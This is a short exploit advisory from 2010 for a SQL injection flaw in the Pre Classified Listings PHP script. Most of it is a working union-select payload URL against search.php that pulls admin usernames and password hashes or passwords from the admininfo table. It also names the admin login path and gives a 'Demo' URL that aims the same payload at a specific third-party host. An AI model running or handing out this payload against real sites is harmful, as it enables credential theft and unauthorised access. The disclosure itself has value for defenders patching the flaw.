Pre Classified Listings suffers from a remote SQL injection vulnerability.
7cb431bafcc4a3f18594b61da3b8b5cee5371fb86e7f9895dd15ad453faeb0da
In The Name Of GOD
[+] Exploit Title: Pre Classified Listings PHP SQL Injection Vulnerability
[+] Date: 2010-11-14
[+] Author : Cru3l.b0y
[+] Software Link: http://www.preproject.com/pclphp.asp
[+] Price : 48.00$
[+] Contact : Cru3l.b0y@gmail.com
[+] Website : WwW.PenTesters.IR
[+] Greeting: Behzad, Ahmad, ...
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
[+] Exploit :
http://target/path/search.php?category=-1+union+select+group_concat(username,0x3a,password)+from+admininfo
[+] Admin Page: /admin/index.php
[+] Demo: http://www.hostnomi.net/classi/search.php?category=-1+union+select+group_concat(username,0x3a,password)+from+admininfo